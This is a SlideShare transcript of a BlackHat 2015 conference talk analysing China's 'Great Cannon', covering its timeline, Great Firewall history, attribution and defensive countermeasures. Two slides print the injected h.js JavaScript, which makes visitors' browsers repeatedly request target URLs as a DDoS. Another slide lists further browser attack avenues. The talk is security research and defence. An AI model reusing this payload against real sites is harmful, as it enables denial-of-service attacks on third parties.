SlideShare a Scribd company logo

Bringing a Cannon to a Knife Fight

J
Johannes Gilger

The document discusses the "Great Cannon," an offensive cyber weapon used by China to conduct distributed denial-of-service (DDoS) attacks. It summarizes the timeline of the Great Cannon attacks in March-April 2015, which injected malicious JavaScript onto websites to overwhelm targets like GitHub and CloudFront. It then provides background on China's censorship apparatus, known as the "Great Firewall," and possible entities involved in the Great Cannon attacks, including military and intelligence groups. It concludes by considering whether the Great Cannon may be used for more targeted attacks in the future.

Technology
1 of 51
Download to read offline
Bringing a Cannon to a Knife Fight Deciphering China’s offensive Cyber-Weapon Adam Kozy & Johannes Gilger - BlackHat USA 2015
Adam Kozy Security Researcher China enthusiast Intro: About Us Johannes Gilger Security Researcher HTTPS enthusiast ;) You don’t have a malware problem, you have an adversary problem! ™ CrowdStrike Inc. Next-Generation Endpoint Protection
Outline ◦ Intro ◦ The Great Cannon incident ◦ A short history of the Great Firewall (GFW) ◦ Aftermath of the Great Cannon Attacks ◦ Possible Countermeasures ◦ Attribution ◦ Predictions 3
“ 在我演讲以前我要先和在座的中国朋友说 一下,我的演讲内容是一个学术讨论的课 题没有政治目的或恶意。我们明白中国和 西方有很多不一样的地方,也尊重中国的 信息工程能力,但是在国外实行审查制度 开了个危险的先例。 4 Quick Disclaimers: Disclaimer: The opinions expressed in this talk are our own and do not necessarily reflect the opinion of our employer.
The Great Cannon We’re seeing a lot of action... 1 5
Great Cannon: First signs 6
The attack on GitHub 7
GreatFire: Censorship monitor 8 Tracking of blocked keywords & censorship circumvention tools
GreatFire uses Collateral Freedom 9 Idea: Economic cost of blocking GitHub / Cloudfront prohibitive
Chinese activity in Cyberspace Jan 18 - Jan 23 2013: GitHub blocked Jan 25 2013: Petition on GFW contributors Jan 26 2013: TLS MiTM against GitHub Jun 14 - 15 2013: DDoS attacks against HK Pop Vote Aug 28 2014: TLS MiTM against Google (CERNET) Oct 1 2014: TLS MiTM against Yahoo Oct 20 2014: TLS MiTM against iCloud Jan 9 2015: DNS Poisoning redirects begin Jan 19 2015: TLS MiTM against outlook.com Mar 16 2015: WSJ Article Mar 3 - Apr 7 2015: Great Cannon attacks Jul 7 2015: Draft Cyber Sovereignty law published 10
A short history of the GFW Censorship and Crowd-Control in China 2 11
Inception of the GFW - 1987 - “Across the Great Wall, we can reach every corner of the world.” - 1990 - Top-level domain .cn registered - 1994 - First high-speed commercial line Beijing to Shanghai - CANET (CAS, TKU, PKU) & CHINANET (CN Telecom) - 1997 - CNNIC founding - April 1999 - Falun Gong Demonstration - June 1999 - Ministry of Information & Industry (MII) creates “The Center” 12
It’s a trap... - Golden Shield Project (GSP) - Propaganda vs. Security - GSP at provincial level - Managed by MPS - GFW: Bottle-neck ALL the traffic! - GSP more expensive, GFW better researchers - Later complementary 13
Choke points: Landing sites at the first three National Level Nodes 14 Source: PCCW Global
The Center 15 National Computer Network and Information Security Management Center (国家计算机网络与信息安全管理中心)
The Center 16 - 1999: created under MII (now: MIIT) - Offices: Beijing, Shanghai, Guangzhou & Provincial - 2001: Establishment of CNCERT/CC - Several awards and government funds related to 863 plan - 2002 - Project 005 & web content filtering - Today: Still active, reporting to MIIT
17 A Wild FANG BINXING Appears! The “Father” of the GFW 1984-1989: Harbin Institute of Tech. (HIT) 1999: Deputy Chief Engineer, Center 2001: Deputy Director, Center - Also named “Outstanding individual” and given “special allowances” 2002-2006: Director, Center 2007-2013: President of BUPT 2008: Elected to 11th NPC 2013: Retired (Health-related) Present: Devoted to research, likely remains on several councils "I'm not interested in reading messy information like some of that anti-government stuff." -方滨兴
Influential Figures Yun Xiaochun 云晓春 1999-2002: Deputy Director of HIT Information Security Research Center 2002: S&T National award for work on Project 005 2008-2012: Deputy Director CNCERT/CC - Believed to have taken over as Director of The Center after Fang May 2015: Inducted into China Academy of Engineering - listed as current Center Director - Also currently chairs several high-level CN Internet committees Li Jianhua 李建华 2000-Present: SJTU Professor & current Dean of SISE program 2001: Lead for S219 Project (GSP) 2003: Award for Network Media Regulatory Information System 2004: Award for XXX - Papers with Fang and Yun - Technical expert to NSB & Shanghai security bureau - Papers with Unit 61398 - Chairs several other high-level committees and working groups 18
Aftermath How the Great Cannon works 3 19
Great Cannon: Timeline 20Source: Google Safe Browsing Mar 3 - 5 Testing, with request limits Mar 14 - 17 Targeting of CloudFront Mar 18 - 25 More CloudFront hosts Mar 26 - end GitHub targeting, obfuscation Idea: JavaScript-based DDoS by injecting code into high-volume websites (Baidu, etc) which will request and overwhelm resources at the target.
Great Cannon: HTTP Man-in-the-middle 21Source: Citizen Lab
Locating the attacker - Citizenlab: cannon_traceroute.py - GC active on AS4837 and AS4808 - China Unicom Infrastructure - Two IPv4 hops after entry into China - Same hops as the Great Firewall - Shares same side-channels - Distinct system & capabilities - Exact location: “Does it matter?” 22
Great Cannon: Established facts 23Source: Citizen Lab - Injects malicious JavaScript - Targets by destination IP address - Probabilistic targeting - Acts on the first data packet - Acts even without TCP SYN - Will act on incorrect HTTP requests - Only targeted international users
The payload Malicious JavaScript - A closer look 24
h.js - The injected JavaScript document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min. js'></script>"); !window.jQuery && document.write("<script src='http://code.jquery. com/jquery-latest.js'></script>"); startime = new Date().getTime(); var count = 0; function unixtime() { var dt = new Date(); var ux = Date.UTC(dt.getFullYear(), dt.getMonth(), dt.getDay(), dt.getHours(), dt.getMinutes(), dt.getSeconds()) / 1000; return ux; } url_array = new Array("https://d117ucqx7my6vj.cloudfront.net", ...) NUM = url_array.length; function r_send2() { var x = unixtime() % NUM; var url = url_array[x]; get(url); } function r_send(ping) { setTimeout("r_send2()", ping); } setTimeout("r_send2()", 2000); 25
h.js - The injected JavaScript function get(myurl) { var ping; $.ajax({ url: myurl + "?" + unixtime(), dataType: "text", timeout: 10000, cache: true, beforeSend: function() { requestTime = new Date().getTime(); }, complete: function() { responseTime = new Date().getTime(); ping = Math.floor(responseTime - requestTime); if (responseTime - startime < 300000) { r_send(ping); count = count + 1; } } }); } 26
Exhibit B: h.js (injected) Short code snippet, still some indicators: - Incoherent variable naming - Needless and buggy timestamp generation - Complicated function definitions - Leftover code fragments (count) - Reliance on jQuery - Improvement during campaign (p,a,c,k,e,d) Bottom line: Sloppy, Copy & Paste code 27
Copy & Paste: jQuery ping, found at multiple locations (including GitHub) 28
So? It’s only JavaScript, right? - Browsing without JavaScript: Not realistic - Many websites relying on external ads - Manual unblocking of JavaScript not feasible - What is malicious behaviour for JavaScript? 29
JavaScript - Individual Risks - Persistent Strategic Web Compromise (SWC) - Frameworks already exist (Scanbox, BeEF, etc.) - Easy user identification: Evercookie, Panopticlick - Drive-by-exploitation still a topic in 2015 - Recent examples: Flash & Java 0-days - Great Cannon: Easier than Man-on-the-side - Pure JavaScript attack vectors - WebRTC to get the real host IP (goodbye TOR) - Cross-Site Request Forgery to attack internal devices 30
Countermeasures Protection & Prevention 4 31
Countermeasures: In a nutshell HTTPS E2E confidentiality Integrity Protection HSTS HTTP Strict Transport Security HSTS Preload List Cert Pinning HSTS Preload List HTTP Header Monitoring Looking out for injections Resource activity analysis Detection Detecting attacks against your infrastructure Response Putting pressure on service providers 32
HTTPS & China Website Description HTTPS Mixed HTTPS 301 HSTS Baidu Search Engine QQ Instant Messenger - Taobao / Alipay eCommerce Sina Weibo Twitter - TMall eBay hao123 Miscellaneous - Sohu Online TV - 360 Browser / Apps - RenRen Facebook - Amazon.cn Amazon ;) 33
HTTPS & USA Website Description HTTPS Mixed HTTPS 301 HSTS Google Search Engine Bing Search Engine eBay eCommerce - Twitter Short messaging Amazon eCommerce Yahoo Search Engine Youtube Video website Dropbox Cloud storage - Facebook Facebook Outlook.com Web Mail 34 Also see: EFF SSL survey
HTTPS & China - Few incentives to adopt HTTPS - Convenient public reason - Baidu will not index HTTPS sites - HSTS List: 6 obscure CN sites - Currently: No CN Root CA in browsers - CNNIC CA removed by Chrome / Firefox - Although: Reinstatement likely 35
HTTPS - What you can do - TLS has never been easier to deploy - www.istlsfastyet.com - Free, automatic CA: Let’s Encrypt - HTTP 2.0 will require TLS - Consider HSTS & preloading - HTTP Public Key Pinning Extension - Protects against intermittent MiTM - Violations can be reported automatically 36 Bottom-line: Threat from rogue CA can be reduced, no reason not to use TLS!
Monitoring Question: How could you watch out for an attack like this? Static monitoring of JavaScript is not going to cut it! - JavaScript resources change frequently - Have to be reviewed for malicious intent Monitoring dynamic behaviour looks more promising. - How does the website “behave”? - Solution: Build DOM and execute JavaScript - Different approaches (PhantomJS) possible 37
Monitoring: Requirements This is the level of information we want - Details on resource requests & response - JavaScript execution & errors - Believable User Agent, Headers, Requests - Stable and secure execution environment - Retrieval of resource content Basically: An instrumented web-browser 38
Monitoring: Approach Google Chrome Inspector - Inspector uses Remote Debugging Protocol - Start Chrome with --remote-debugging-port=9222 - WebSocket JSON API, NodeJS module exists What does it offer? - Details on resource requests & response: ✔ - JavaScript execution & errors: ✔ - Believable User Agent: ✔ (it’s Chrome alright) - Stable and secure: ✔ and ✔ (use a VM) - Resource content: ✔ 39
Monitoring: Setup - Frequent and distributed browsing of sites - Use TOR / VPS / VPN / Proxies for different exits - Store relevant metadata and JavaScript content - Create call-graph of domains - Annotate with third-party information - But: What do you monitor? How do you alert? Bottom line: Monitoring is no substitute for proper transport security. 40
Attribution Behind the curtain 5 41
Possible contributors 42
Consolidation & Organization of CN Cyber 43 - Consolidation puts Xi Jinping and Lu Wei at the top of the decision making process - Shows plenty of crossover and working groups that mix civilian and military groups - Several expert working groups are staffed by some of the original GFW contributors - Suggests collaboration as there are few organizations approved to carry out offensive operations abroad (PLA, MSS, MPS)
Possible contributors Li and Fang as part of 863 committee on with 3PLA 1st Bureau (Unit 61786), MSS 13th Bureau (S&T), and MIIT members 44
Possible contributors Fang Binxing (l) and Li Jianhua at 973 project conference (2014) 45
Predictions What happens next? 6 46
Will we see the GC again? - Will we see the Great Cannon being used in the exact same way? - At what point will there be blowback? - Luckily, this was an early and unsophisticated attack, but how could it further evolve? - Will the Great Cannon be used in a more targeted and covert fashion? - If so: What role might the CNNIC CA play? - Might control over the Great Cannon be given to departments tasked with targeted attacks? 47
Who might be hit next? The usual suspects: - Taiwanese General Election (January 2016) - Hong Kong Popular Vote - South China Sea territorial disputes Also: Targeted attacks against domestic entities. 48
Thanks for your attention! Adam Kozy & Johannes Gilger - BlackHat USA 2015 49
50 References & Suggested Reading - The Citizen Lab - China’s Great Cannon, April 10 2015 - GreatFire.org - Chinese Authorities compromise millions, March 31 2015 - Open Letter to Lu Wei, 26 January 2015 - Google - JavaScript-based DDoS Attack, 24 April 2015 - OpenNet Initiative - Internet Filtering in China, 2004 - Gov.cn - Establishment of National Informatization Group, 23 December 1999 Slides and Pictograms by SlidesCarnival.com
51

Recommended

Thotcon 0x5 - Retroactive Wiretapping VPN over DNS
Thotcon 0x5 - Retroactive Wiretapping VPN over DNSThotcon 0x5 - Retroactive Wiretapping VPN over DNS
Thotcon 0x5 - Retroactive Wiretapping VPN over DNSJohn Bambenek
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APIKevin Hakanson
 
Crowdfunding by Podium Partners
Crowdfunding by Podium PartnersCrowdfunding by Podium Partners
Crowdfunding by Podium PartnersSport and Recreation Alliance
 
Social media: Online brand protection
Social media: Online brand protectionSocial media: Online brand protection
Social media: Online brand protectionSport and Recreation Alliance
 
BrandShield - Online Brand Protection Tool
BrandShield - Online Brand Protection ToolBrandShield - Online Brand Protection Tool
BrandShield - Online Brand Protection ToolBrandshield
 
ICANN 50: New gTLD Registry Operator Engagement
ICANN 50: New gTLD Registry Operator EngagementICANN 50: New gTLD Registry Operator Engagement
ICANN 50: New gTLD Registry Operator EngagementICANN
 
Melbourne IT - iStrategy Atlanta
Melbourne IT - iStrategy AtlantaMelbourne IT - iStrategy Atlanta
Melbourne IT - iStrategy AtlantaiStrategy
 
Icann Presentation @OBP Milano 18 novembre2009
Icann Presentation @OBP Milano 18 novembre2009Icann Presentation @OBP Milano 18 novembre2009
Icann Presentation @OBP Milano 18 novembre2009Register.it
 

Recommended

Thotcon 0x5 - Retroactive Wiretapping VPN over DNS
Thotcon 0x5 - Retroactive Wiretapping VPN over DNSThotcon 0x5 - Retroactive Wiretapping VPN over DNS
Thotcon 0x5 - Retroactive Wiretapping VPN over DNSJohn Bambenek
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APIKevin Hakanson
 
Crowdfunding by Podium Partners
Crowdfunding by Podium PartnersCrowdfunding by Podium Partners
Crowdfunding by Podium PartnersSport and Recreation Alliance
 
Social media: Online brand protection
Social media: Online brand protectionSocial media: Online brand protection
Social media: Online brand protectionSport and Recreation Alliance
 
BrandShield - Online Brand Protection Tool
BrandShield - Online Brand Protection ToolBrandShield - Online Brand Protection Tool
BrandShield - Online Brand Protection ToolBrandshield
 
ICANN 50: New gTLD Registry Operator Engagement
ICANN 50: New gTLD Registry Operator EngagementICANN 50: New gTLD Registry Operator Engagement
ICANN 50: New gTLD Registry Operator EngagementICANN
 
Melbourne IT - iStrategy Atlanta
Melbourne IT - iStrategy AtlantaMelbourne IT - iStrategy Atlanta
Melbourne IT - iStrategy AtlantaiStrategy
 
Icann Presentation @OBP Milano 18 novembre2009
Icann Presentation @OBP Milano 18 novembre2009Icann Presentation @OBP Milano 18 novembre2009
Icann Presentation @OBP Milano 18 novembre2009Register.it
 
Protecting Your Company's Brand & Reputation Online
Protecting Your Company's Brand & Reputation OnlineProtecting Your Company's Brand & Reputation Online
Protecting Your Company's Brand & Reputation OnlineMarvin Dejean
 
Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016
Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016 Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016
Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016 Jasmine Sandler
 
2. Cyber Intelligence in online gambling final
2. Cyber Intelligence in online gambling final2. Cyber Intelligence in online gambling final
2. Cyber Intelligence in online gambling finalMARIUS EUGEN OPRAN
 
Science analysis
Science analysisScience analysis
Science analysis14771
 
งานไฟฟ้า
งานไฟฟ้างานไฟฟ้า
งานไฟฟ้าNatdanai Kumpao
 
part 1
part 1part 1
part 1xoxot1naxoxo
 
самара космическая верфь россии(гагаринцы)
самара космическая верфь россии(гагаринцы)самара космическая верфь россии(гагаринцы)
самара космическая верфь россии(гагаринцы)Lopatino
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersMegan DeBlois
 
A reading of the IBM Research 5-in-5 2018 Edition
A reading of the IBM Research 5-in-5 2018 EditionA reading of the IBM Research 5-in-5 2018 Edition
A reading of the IBM Research 5-in-5 2018 EditionPietro Leo
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Keith Kraus
 
Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...
Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...
Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...Amélie Gyrard
 
CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...
CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...
CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...PROIDEA
 
Quantum Hardware Hacking
Quantum Hardware HackingQuantum Hardware Hacking
Quantum Hardware HackingMark Carney
 
Building Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and PaillierBuilding Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and PaillierNicholas Doiron
 
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatThe Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatDuo Security
 
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...NoNameCon
 
Defense in Depth: Lessons Learned Securing 200,000 Sites
Defense in Depth: Lessons Learned Securing 200,000 SitesDefense in Depth: Lessons Learned Securing 200,000 Sites
Defense in Depth: Lessons Learned Securing 200,000 SitesPantheon
 
How to use shodan more powerful
How to use shodan more powerful How to use shodan more powerful
How to use shodan more powerful National Cheng Kung University
 
How I Learned to Stop Information Sharing and Love the DIKW
How I Learned to Stop Information Sharing and Love the DIKWHow I Learned to Stop Information Sharing and Love the DIKW
How I Learned to Stop Information Sharing and Love the DIKWSounil Yu
 
Monitoring ICS Communications
Monitoring ICS CommunicationsMonitoring ICS Communications
Monitoring ICS CommunicationsDigital Bond
 
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...sparkfabrik
 
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...Felipe Prado
 

More Related Content

Viewers also liked

Protecting Your Company's Brand & Reputation Online
Protecting Your Company's Brand & Reputation OnlineProtecting Your Company's Brand & Reputation Online
Protecting Your Company's Brand & Reputation OnlineMarvin Dejean
 
Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016
Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016 Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016
Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016 Jasmine Sandler
 
2. Cyber Intelligence in online gambling final
2. Cyber Intelligence in online gambling final2. Cyber Intelligence in online gambling final
2. Cyber Intelligence in online gambling finalMARIUS EUGEN OPRAN
 
Science analysis
Science analysisScience analysis
Science analysis14771
 
งานไฟฟ้า
งานไฟฟ้างานไฟฟ้า
งานไฟฟ้าNatdanai Kumpao
 
самара космическая верфь россии(гагаринцы)
самара космическая верфь россии(гагаринцы)самара космическая верфь россии(гагаринцы)
самара космическая верфь россии(гагаринцы)Lopatino
 

Viewers also liked (7)

Protecting Your Company's Brand & Reputation Online
Protecting Your Company's Brand & Reputation OnlineProtecting Your Company's Brand & Reputation Online
Protecting Your Company's Brand & Reputation Online
 
Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016
Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016 Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016
Agent-cy Online Marketing Services & Digital Marketing Training Programs 2016
 
2. Cyber Intelligence in online gambling final
2. Cyber Intelligence in online gambling final2. Cyber Intelligence in online gambling final
2. Cyber Intelligence in online gambling final
 
Science analysis
Science analysisScience analysis
Science analysis
 
งานไฟฟ้า
งานไฟฟ้างานไฟฟ้า
งานไฟฟ้า
 
part 1
part 1part 1
part 1
 
самара космическая верфь россии(гагаринцы)
самара космическая верфь россии(гагаринцы)самара космическая верфь россии(гагаринцы)
самара космическая верфь россии(гагаринцы)
 

Similar to Bringing a Cannon to a Knife Fight

OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersMegan DeBlois
 
A reading of the IBM Research 5-in-5 2018 Edition
A reading of the IBM Research 5-in-5 2018 EditionA reading of the IBM Research 5-in-5 2018 Edition
A reading of the IBM Research 5-in-5 2018 EditionPietro Leo
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Keith Kraus
 
Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...
Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...
Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...Amélie Gyrard
 
CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...
CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...
CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...PROIDEA
 
Quantum Hardware Hacking
Quantum Hardware HackingQuantum Hardware Hacking
Quantum Hardware HackingMark Carney
 
Building Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and PaillierBuilding Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and PaillierNicholas Doiron
 
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatThe Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatDuo Security
 
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...NoNameCon
 
Defense in Depth: Lessons Learned Securing 200,000 Sites
Defense in Depth: Lessons Learned Securing 200,000 SitesDefense in Depth: Lessons Learned Securing 200,000 Sites
Defense in Depth: Lessons Learned Securing 200,000 SitesPantheon
 
How I Learned to Stop Information Sharing and Love the DIKW
How I Learned to Stop Information Sharing and Love the DIKWHow I Learned to Stop Information Sharing and Love the DIKW
How I Learned to Stop Information Sharing and Love the DIKWSounil Yu
 
Monitoring ICS Communications
Monitoring ICS CommunicationsMonitoring ICS Communications
Monitoring ICS CommunicationsDigital Bond
 
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...sparkfabrik
 
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...Felipe Prado
 
Global Cyber Security trend & impact of Internet on the society of Bangladesh...
Global Cyber Security trend & impact of Internet on the society of Bangladesh...Global Cyber Security trend & impact of Internet on the society of Bangladesh...
Global Cyber Security trend & impact of Internet on the society of Bangladesh...Fakrul Alam
 
New Business Models enabled by Blockchain
New Business Models enabled by BlockchainNew Business Models enabled by Blockchain
New Business Models enabled by BlockchainSlash
 
Hitbkl 2012
Hitbkl 2012Hitbkl 2012
Hitbkl 2012F _
 
Why vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelWhy vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelKirill Ermakov
 

Similar to Bringing a Cannon to a Knife Fight (20)

OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and Practitioners
 
A reading of the IBM Research 5-in-5 2018 Edition
A reading of the IBM Research 5-in-5 2018 EditionA reading of the IBM Research 5-in-5 2018 Edition
A reading of the IBM Research 5-in-5 2018 Edition
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
 
Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...
Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...
Keynote WFIoT2019 - Data Graph, Knowledge Graphs Ontologies, Internet of Thin...
 
CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...
CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...
CONFidence 2017: Hackers vs SOC - 12 hours to break in, 250 days to detect (G...
 
Quantum Hardware Hacking
Quantum Hardware HackingQuantum Hardware Hacking
Quantum Hardware Hacking
 
Building Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and PaillierBuilding Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and Paillier
 
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatThe Internet of Things: We've Got to Chat
The Internet of Things: We've Got to Chat
 
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
 
Defense in Depth: Lessons Learned Securing 200,000 Sites
Defense in Depth: Lessons Learned Securing 200,000 SitesDefense in Depth: Lessons Learned Securing 200,000 Sites
Defense in Depth: Lessons Learned Securing 200,000 Sites
 
How to use shodan more powerful
How to use shodan more powerful How to use shodan more powerful
How to use shodan more powerful
 
How I Learned to Stop Information Sharing and Love the DIKW
How I Learned to Stop Information Sharing and Love the DIKWHow I Learned to Stop Information Sharing and Love the DIKW
How I Learned to Stop Information Sharing and Love the DIKW
 
Monitoring ICS Communications
Monitoring ICS CommunicationsMonitoring ICS Communications
Monitoring ICS Communications
 
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
CodeMotion 2023 - Deep dive nella supply chain della nostra infrastruttura cl...
 
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
 
Netsoft19 Keynote: Fluid Network Planes
Netsoft19 Keynote: Fluid Network PlanesNetsoft19 Keynote: Fluid Network Planes
Netsoft19 Keynote: Fluid Network Planes
 
Global Cyber Security trend & impact of Internet on the society of Bangladesh...
Global Cyber Security trend & impact of Internet on the society of Bangladesh...Global Cyber Security trend & impact of Internet on the society of Bangladesh...
Global Cyber Security trend & impact of Internet on the society of Bangladesh...
 
New Business Models enabled by Blockchain
New Business Models enabled by BlockchainNew Business Models enabled by Blockchain
New Business Models enabled by Blockchain
 
Hitbkl 2012
Hitbkl 2012Hitbkl 2012
Hitbkl 2012
 
Why vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelWhy vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheel
 

Recently uploaded

Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaRTTS
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...Elena Simperl
 
UiPath New York Community Day in-person event
UiPath New York Community Day in-person eventUiPath New York Community Day in-person event
UiPath New York Community Day in-person eventDianaGray10
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxAbida Shariff
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Product School
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
